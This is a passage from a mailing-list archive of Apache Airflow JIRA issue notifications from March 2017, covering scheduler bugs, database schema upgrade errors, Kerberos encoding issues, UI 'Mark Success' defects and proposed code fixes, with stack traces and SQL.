> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] 

[jira] [Resolved] (AIRFLOW-803) Manual triggered dags are not running

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-803?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-803.

Resolution: Fixed

> Manual triggered dags are not running 
> --
>
> Key: AIRFLOW-803
> URL: https://issues.apache.org/jira/browse/AIRFLOW-803
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: scheduler
>Affects Versions: 1.8.0b2
>Reporter: Bolke de Bruin
>Priority: Blocker
> Fix For: 1.8.0b3
>
>
> After cgroups+impersonation was added, the task_instances for manually 
> created dag_runs are not executed anymore. This is due to the fact that the 
> task_instance table is now joined against running dag_runs with a 
> 'scheduled' run_id.
> This change is, however, not required, as task_instances will only be in the 
> 'scheduled' state when they are sent to the executor. Tasks from dag_runs in 
> failed state will not be scheduled by contract.





[jira] [Resolved] (AIRFLOW-807) Scheduler is very slow when a .py file has many DAGs in it

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-807?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-807.

Resolution: Fixed

> Scheduler is very slow when a .py file has many DAGs in it
> --
>
> Key: AIRFLOW-807
> URL: https://issues.apache.org/jira/browse/AIRFLOW-807
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: scheduler
>Affects Versions: 1.8.0b2
>Reporter: Chris Riccomini
>Assignee: Chris Riccomini
> Fix For: Airflow 1.8
>
>
> While running Airflow 1.8.0b2 in production, we noticed a significant 
> performance issue with one of our DAGs.
> The .py file (called db.py) generates a bunch of DAGs. This file was taking > 
> 900 seconds for the scheduler to process, which was introducing significant 
> delays in our data pipeline.
> We enabled slow_query log for MySQL, and saw that this query was taking more 
> than 10 seconds per DAG in the .py file:
> {code:sql}
> SELECT task_instance.task_id AS task_id, max(task_instance.execution_date) AS 
> max_ti 
> FROM task_instance 
> WHERE task_instance.dag_id = 'dag1' AND task_instance.state = 'success' AND 
> task_instance.task_id IN ('t1', 't2') GROUP BY task_instance.task_id
> {code}
> This query is run inside jobs.py's manage_slas method. When running an 
> explain, we can see that MySQL is using the wrong index for it:
> {noformat}
> +----+-------------+---------------+------+----------------------------------------------------+----------+---------+-------+-------+--------------------------+
> | id | select_type | table         | type | possible_keys                                      | key      | key_len | ref   | rows  | Extra                    |
> +----+-------------+---------------+------+----------------------------------------------------+----------+---------+-------+-------+--------------------------+
> |  1 | SIMPLE      | task_instance | ref  | PRIMARY,ti_dag_state,ti_pool,ti_state_lkp,ti_state | ti_state | 63      | const | 81898 | Using where; Using index |
> +----+-------------+---------------+------+----------------------------------------------------+----------+---------+-------+-------+--------------------------+
> {noformat}
> It's using ti_state, but should be using ti_primary. We tried running 
> ANALYZE/OPTIMIZE on the {{task_instance}} table, but it didn't improve the 
> query plan or performance time.
> Next, we added a hint to the SqlAlchemy query object, which improved the 
> performance by about 10x, dropping the db.py parsing down to 90 seconds.
> I then got another 2x boost by simply aborting the manage_slas method at the 
> start if the DAG has no tasks SLAs in it (none of our DAGs do). This dropped 
> the db.py parse time to 45-50 seconds.
> This JIRA is to add a short circuit in manage_slas, and a hint for MySQL in 
> the query.
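A sketch of the two changes under the stated assumptions (model attributes simplified, not the merged patch): bail out of manage_slas when no task defines an SLA, and pass an index hint to MySQL through SQLAlchemy.

{code}
from sqlalchemy import func

def manage_slas(dag, session, TI, State):
    # Short circuit: skip the expensive query when no task has an SLA.
    if not any(task.sla is not None for task in dag.tasks):
        return []
    qry = (
        session.query(TI.task_id, func.max(TI.execution_date).label('max_ti'))
        .with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
        .filter(TI.dag_id == dag.dag_id,
                TI.state == State.SUCCESS,
                TI.task_id.in_(dag.task_ids))
        .group_by(TI.task_id)
    )
    return qry.all()
{code}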





[jira] [Closed] (AIRFLOW-810) Alembic upgrade path not consistent due to reverted index creation

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-810?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin closed AIRFLOW-810.
--
   Resolution: Fixed
Fix Version/s: 1.8.0

> Alembic upgrade path not consistent due to reverted index creation
> --
>
> Key: AIRFLOW-810
> URL: https://issues.apache.org/jira/browse/AIRFLOW-810
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>






[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924980#comment-15924980
 ] 

Ruslan Dautkhanov commented on AIRFLOW-980:
---

It seems the database schema changed from 1.7 to 1.8: "column 
task_instance.pid does not exist"
Is there a documented way to upgrade the database to the new schema?
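As noted elsewhere in this thread, the schema migration command resolves this:

{noformat}
$ airflow upgradedb
{noformat}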

> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution), 
> I started seeing the error stack below again and again in the scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': 

[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924978#comment-15924978
 ] 

Ruslan Dautkhanov commented on AIRFLOW-980:
---

I've upgraded Airflow to 1.8.0-rc5 as you suggested. The webserver started 
fine; the scheduler fails and dies with the following exception:

{noformat}
[2017-03-14 14:52:13,474] {jobs.py:1311} INFO - Exited execute loop
Traceback (most recent call last):
  File "/opt/cloudera/parcels/Anaconda/bin/airflow", line 28, in <module>
args.func(args)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/bin/cli.py",
 line 839, in scheduler
job.run()
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
line 200, in run
self._execute()
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
line 1309, in _execute
self._execute_helper(processor_manager)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
line 1364, in _execute_helper
self.reset_state_for_orphaned_tasks(dr, session=session)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/utils/db.py",
 line 53, in wrapper
result = func(*args, **kwargs)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
line 227, in reset_state_for_orphaned_tasks
tis.extend(dag_run.get_task_instances(state=State.SCHEDULED, 
session=session))
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/utils/db.py",
 line 53, in wrapper
result = func(*args, **kwargs)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py", 
line 3960, in get_task_instances
return tis.all()
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
 line 2588, in all
return list(self)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
 line 2736, in __iter__
return self._execute_and_instances(context)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
 line 2751, in _execute_and_instances
result = conn.execute(querycontext.statement, self._params)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/base.py",
 line 914, in execute
return meth(self, multiparams, params)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/sql/elements.py",
 line 323, in _execute_on_connection
return connection._execute_clauseelement(self, multiparams, params)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/base.py",
 line 1010, in _execute_clauseelement
compiled_sql, distilled_params
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/base.py",
 line 1146, in _execute_context
context)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/base.py",
 line 1341, in _handle_dbapi_exception
exc_info
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/util/compat.py",
 line 200, in raise_from_cause
reraise(type(exception), exception, tb=exc_tb, cause=cause)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/base.py",
 line 1139, in _execute_context
context)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/default.py",
 line 450, in do_execute
cursor.execute(statement, parameters)
sqlalchemy.exc.ProgrammingError: (psycopg2.ProgrammingError) column 
task_instance.pid does not exist
LINE 1: ...nstance.queued_dttm AS task_instance_queued_dttm, task_insta...
 ^
 [SQL: 'SELECT task_instance.task_id AS task_instance_task_id, 
task_instance.dag_id AS task_instance_dag_id, task_instance.execution_date AS 
task_instance_execution_date, task_instance.start_date AS 
task_instance_start_date, task_instance.end_date AS task_instance_end_date, 
task_instance.duration AS task_instance_duration, task_instance.state AS 
task_instance_state, task_instance.try_number AS task_instance_try_number, 
task_instance.hostname AS task_instance_hostname, task_instance.unixname AS 
task_instance_unixname, task_instance.job_id AS task_instance_job_id, 
task_instance.pool AS task_instance_pool, task_instance.queue AS 
task_instance_queue, task_instance.priority_weight AS 
task_instance_priority_weight, task_instance.operator AS 
task_instance_operator, task_instance.queued_dttm AS task_instance_queued_dttm, 
task_instance.pid AS task_instance_pid \nFROM task_instance \nWHERE 
task_instance.dag_id = %(dag_id_1)s AND task_instance.execution_date = 
%(execution_date_1)s AND task_instance.state = %(state_1)s'] [parameters: 
{'state_1': u'scheduled', 'execution_date_1': datetime.datetime(2015, 1, 1, 

[jira] [Updated] (AIRFLOW-834) get_dep_statuses raises PendingDeprecationWarning in Python 3.5

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-834?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin updated AIRFLOW-834:
---
Fix Version/s: 1.8.0

> get_dep_statuses raises PendingDeprecationWarning in Python 3.5
> ---
>
> Key: AIRFLOW-834
> URL: https://issues.apache.org/jira/browse/AIRFLOW-834
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.8, 1.8.0b5
>Reporter: Marek BaczyƄski
>Priority: Minor
>  Labels: easyfix
> Fix For: 1.8.0
>
>
> {noformat}
> venv/src/airflow/airflow/ti_deps/deps/base_ti_dep.py:94: 
> PendingDeprecationWarning: generator '_get_dep_statuses' raised StopIteration
> for dep_status in self._get_dep_statuses(ti, session, dep_context):
> {noformat}
> The fix would be to change these into a plain return.
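A self-contained illustration of the fix: under PEP 479, raising StopIteration inside a generator is deprecated (and later becomes an error), while a bare return ends the generator cleanly.

{code}
def statuses_old():
    yield 'met'
    raise StopIteration   # PendingDeprecationWarning on Python 3.5

def statuses_new():
    yield 'met'
    return                # plain return: the generator simply stops

print(list(statuses_new()))  # ['met']
{code}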





[jira] [Resolved] (AIRFLOW-838) Race condition in LocalTaskJob

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-838?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-838.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Race condition in LocalTaskJob
> --
>
> Key: AIRFLOW-838
> URL: https://issues.apache.org/jira/browse/AIRFLOW-838
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Alex Guziel
>Priority: Minor
> Fix For: 1.8.0
>
>
> Right now, a LocalTaskJob will terminate if the state is not "running", but 
> only if it has observed the state being "running" before. This can lead to a 
> situation in which the job never terminates even though the state is not 
> "running", if the state went from "running" to another state before it 
> could be observed.
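A self-contained sketch of the race (all names are hypothetical): a check gated on having previously observed "running" hangs when the state changes before the first observation, while acting on the current state alone does not.

{code}
def should_terminate_buggy(saw_running, state):
    return saw_running and state != 'running'

def should_terminate_fixed(saw_running, state):
    return state != 'running'

# The task went running -> success before the job ever observed 'running':
print(should_terminate_buggy(False, 'success'))  # False - never terminates
print(should_terminate_fixed(False, 'success'))  # True
{code}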





[jira] [Assigned] (AIRFLOW-840) Python3 encoding issue in Kerberos

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-840?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin reassigned AIRFLOW-840:
--

Assignee: Bolke de Bruin

> Python3 encoding issue in Kerberos
> --
>
> Key: AIRFLOW-840
> URL: https://issues.apache.org/jira/browse/AIRFLOW-840
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: security
>Affects Versions: Airflow 1.8
> Environment: $ python --version
> Python 3.4.3
>Reporter: Erik Cederstrand
>Assignee: Bolke de Bruin
>  Labels: security
>
> While attempting to configure Kerberos ticket renewal in a Python3 
> environment, I encountered this encoding issue trying to run {{airflow 
> kerberos}}:
> {code:none}
> Traceback (most recent call last):
>   File "/usr/local/bin/airflow", line 15, in <module>
> args.func(args)
>   File "/usr/local/lib/python3.4/dist-packages/airflow/bin/cli.py", line 600, 
> in kerberos
> airflow.security.kerberos.run()
>   File "/usr/local/lib/python3.4/dist-packages/airflow/security/kerberos.py", 
> line 110, in run
> renew_from_kt()
>   File "/usr/local/lib/python3.4/dist-packages/airflow/security/kerberos.py", 
> line 55, in renew_from_kt
> "\n".join(subp.stderr.readlines(
> TypeError: sequence item 0: expected str instance, bytes found
> {code}
> The issue here (ignoring for a moment why {{kinit}} is failing on my machine) 
> is that Popen in Python3 returns {{bytes}} for stdin/stdout, but both are 
> handled as if they are {{str}}.
> I'm unsure what the Py2/3 compat policy is at Airflow, but a simple {{from 
> six import PY2}} and an if/else seems like the least intrusive fix. The 
> non-PY2 path would then add something like 
> {{subp.stdin.readlines().decode(errors='ignore')}}
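A runnable sketch of the suggested decode fix (a portable command stands in for kinit): Popen pipes yield bytes on Python 3, so each line must be decoded before joining into a log message.

{code}
import subprocess
import sys

subp = subprocess.Popen([sys.executable, '--version'],
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subp.wait()
out = '\n'.join(l.decode('utf-8', errors='ignore')
                for l in subp.stdout.readlines())
err = '\n'.join(l.decode('utf-8', errors='ignore')
                for l in subp.stderr.readlines())
print(out or err)
{code}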





[jira] [Closed] (AIRFLOW-846) Release schedule, latest tag is too old

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-846?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin closed AIRFLOW-846.
--
Resolution: Not A Bug

http://mail-archives.apache.org/mod_mbox/incubator-airflow-dev/201703.mbox/thread

> Release schedule, latest tag is too old
> ---
>
> Key: AIRFLOW-846
> URL: https://issues.apache.org/jira/browse/AIRFLOW-846
> Project: Apache Airflow
>  Issue Type: Task
>Reporter: Ultrabug
>Priority: Blocker
>  Labels: release, tagging
>
> To my understanding, there is no clear point about the release schedule of 
> the project.
> The latest tag is 1.7.1.3 from June 2016, which is not well suited for 
> production nowadays.
> For example, the latest available release is still affected by AIRFLOW-178, 
> which means that we have to patch the sources in production to work with ZIP 
> files.
> Could you please share your thoughts and position on the release planning of 
> the project?
> Would it be possible to get a newer tag sometime soon?
> Thank you





[jira] [Created] (AIRFLOW-984) Subdags unrecognized when subclassing SubDagOperator

2017-03-14 Thread Patrick McKenna (JIRA)
Patrick McKenna created AIRFLOW-984:
---

 Summary: Subdags unrecognized when subclassing SubDagOperator
 Key: AIRFLOW-984
 URL: https://issues.apache.org/jira/browse/AIRFLOW-984
 Project: Apache Airflow
  Issue Type: Bug
Reporter: Patrick McKenna
Priority: Minor


If a user subclasses SubDagOperator, the parent DAG will not pick up the 
subdags:

https://github.com/jlowin/airflow/blob/44fcabc36048cd6e80660fc023afce85e3d435a0/airflow/models.py#L2969

which means a DagBag won't find them:

https://github.com/jlowin/airflow/blob/44fcabc36048cd6e80660fc023afce85e3d435a0/airflow/models.py#L311
https://github.com/jlowin/airflow/blob/44fcabc36048cd6e80660fc023afce85e3d435a0/airflow/models.py#L365

This PR appears to be the culprit: 
https://github.com/apache/incubator-airflow/pull/1196/files.
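A self-contained sketch of the suspected mechanism (the exact check in models.py is inferred from the links above): an exact class-name comparison excludes subclasses, where an isinstance check would not.

{code}
class SubDagOperator(object):
    pass

class MySubDagOperator(SubDagOperator):
    pass

task = MySubDagOperator()
print(task.__class__.__name__ == 'SubDagOperator')  # False -> subdag missed
print(isinstance(task, SubDagOperator))             # True
{code}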





[jira] [Updated] (AIRFLOW-864) Charts have regressed

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-864?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin updated AIRFLOW-864:
---
Priority: Major  (was: Critical)

> Charts have regressed
> -
>
> Key: AIRFLOW-864
> URL: https://issues.apache.org/jira/browse/AIRFLOW-864
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: webapp
>Reporter: Siddharth Anand
> Attachments: broken_charts_duplicate.png, Show_hide_all_missing.png
>
>
> 
> +*{color:blue} Issue 1 : The task duration endpoint displays 2 charts 
> {color}*+
> !broken_charts_duplicate.png!
> 
> +*{color:blue} Issue 2 : No way currently to hide/show all tasks {color}*+
> There used to be an option to hide/show all tasks. That's gone. I have 20+ 
> tasks but often need to hone in on a single task. That's not possible.
> !Show_hide_all_missing.png!





[jira] [Commented] (AIRFLOW-867) Tons of unit tests are ignored

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-867?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924958#comment-15924958
 ] 

Bolke de Bruin commented on AIRFLOW-867:


[~aoen] [~saguziel] [~jlowin]

> Tons of unit tests are ignored
> --
>
> Key: AIRFLOW-867
> URL: https://issues.apache.org/jira/browse/AIRFLOW-867
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: tests
>Reporter: George Sakkis
>Assignee: George Sakkis
>
> I was poking around in tests and found out that lots of tests are not 
> discovered by nosetests:
> {noformat}
> $ nosetests -q --collect-only 
> --
> Ran 254 tests in 0.948s
> $ grep -R 'def test' tests/ | wc -l
> 360
> {noformat}
> Initially I thought it might be related to not having installed all the 
> extra dependencies, but it turns out it's because nosetests apparently 
> expects an explicit import of the related modules instead of discovering 
> them automatically (like py.test). For example, after adding {{from 
> .ti_deps.deps.runnable_exec_date_dep import *}} to {{tests/__init__.py}} it 
> finds 260 tests, while with all imports in this module commented out it 
> finds only 15!
> h4. Possible options
> * Quick fix: Add the necessary missing "import *" to discover all current 
> tests.
> * Better fix: Rename all test modules to start with "test_"
>   -Move from nosetests to py.test and get rid of the ugly error-prone 'import 
> *' hack.-





[jira] [Resolved] (AIRFLOW-869) Web UI Mark Success Upstream Option Bug

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-869?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-869.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Web UI Mark Success Upstream Option Bug
> ---
>
> Key: AIRFLOW-869
> URL: https://issues.apache.org/jira/browse/AIRFLOW-869
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.8
>Reporter: Yi Chen
> Fix For: 1.8.0
>
>   Original Estimate: 24h
>  Remaining Estimate: 24h
>
> A simple bug report: I tracked this down in the source code of the Airflow 
> Web UI; look at this line: 
> https://github.com/apache/incubator-airflow/blob/v1-8-stable/airflow/www/views.py#L1127
> It should be `relatives = task.get_flat_relatives(upstream=True)`. But 
> even with this fix, there are still issues with the "Mark Success" 
> functionality. I hope we ship this bug fix along with v1.8, and I will open 
> another ticket discussing the functionality of "Mark Success".





[jira] [Resolved] (AIRFLOW-870) Airflow Web UI "Mark Success" action not working properly

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-870?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-870.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Airflow Web UI "Mark Success" action not working properly
> -
>
> Key: AIRFLOW-870
> URL: https://issues.apache.org/jira/browse/AIRFLOW-870
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.8
>Reporter: Yi Chen
> Fix For: 1.8.0
>
>   Original Estimate: 168h
>  Remaining Estimate: 168h
>
> I have found a few issues and some ideas for resolving them:
> 1) *Issue*: In the Web UI, if I click Mark Success on a task that has not been 
> processed (a.k.a. any white box in the list view), I get a "No task instances 
> to mark as successful" error message.
> *Reason*: A task that has not been processed has a record in the task_instance 
> table with a NULL value in the state column. Then, here 
> https://github.com/apache/incubator-airflow/blob/v1-8-stable/airflow/www/views.py#L1146
>  , this line filters out not only the case `TI.state = State.SUCCESS` but 
> also the case `TI.state is NULL`. 
> *Solution*: change this line to ` or_((TI.state.is_(None)), TI.state != 
> State.SUCCESS)).all()` (see the sketch after this report). 
> 2) *Issue*: It is not clear why we need the new "Recursive" option in "Mark 
> Success". I think we used to have the "DownStream" and "UpStream" options with 
> recursive searching. Can anyone explain the design and double-check the 
> implementation? Right now, if I do not choose the "Recursive" option with 
> "DownStream", I get a KeyError on this line 
> https://github.com/apache/incubator-airflow/blob/v1-8-stable/airflow/www/views.py#L1188.
>  
> *Reason*: On this line, 
> https://github.com/apache/incubator-airflow/blob/v1-8-stable/airflow/www/views.py#L1122
>  , we have already got the relatives from the recursive search, and task_ids 
> is populated, but task_id_to_dag is not populated properly if the "Recursive" 
> option is not chosen. Therefore the KeyError shows up later, as mentioned 
> above.
> *Solution*: I think we have to discuss the design of the desired behavior of 
> each option and refactor the code w.r.t. the design.
> [This is my first Apache JIRA ticket. Feel free to point out any mistakes in 
> reporting and describing issues.]
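
The sketch referenced in the solution for issue 1, assuming the query in views.py selects the task instances to mark successful (`TI`, `session`, `task_ids`, and `State` are names from that file; the other filter clauses are assumptions for illustration):

{code}
from sqlalchemy import or_

# Treat never-run tasks (state IS NULL) the same as any non-success state:
tis = session.query(TI).filter(
    TI.dag_id == dag.dag_id,        # assumed surrounding filters
    TI.task_id.in_(task_ids),
    or_(TI.state.is_(None), TI.state != State.SUCCESS),
).all()
{code}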



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-876) Change or document default gunicorn worker class

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-876?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924956#comment-15924956
 ] 

Bolke de Bruin commented on AIRFLOW-876:


PR welcome on documentation

> Change or document default gunicorn worker class
> 
>
> Key: AIRFLOW-876
> URL: https://issues.apache.org/jira/browse/AIRFLOW-876
> Project: Apache Airflow
>  Issue Type: Improvement
>Reporter: Peter Marton
>Priority: Minor
>
> The sync gunicorn worker class is not production ready unless behind a proxy 
> like nginx. This is clearly documented in the gunicorn docs, but never 
> mentioned anywhere in the Airflow docs. I feel that either the default should 
> be changed to one of the asynchronous models or users should be adequately 
> warned.
> What makes this even more painful is that AWS ELB tries to keep connections 
> open for health checks, essentially DoSing the Airflow webserver when used 
> with the default config. It also happens with Chrome's URL preloading, as 
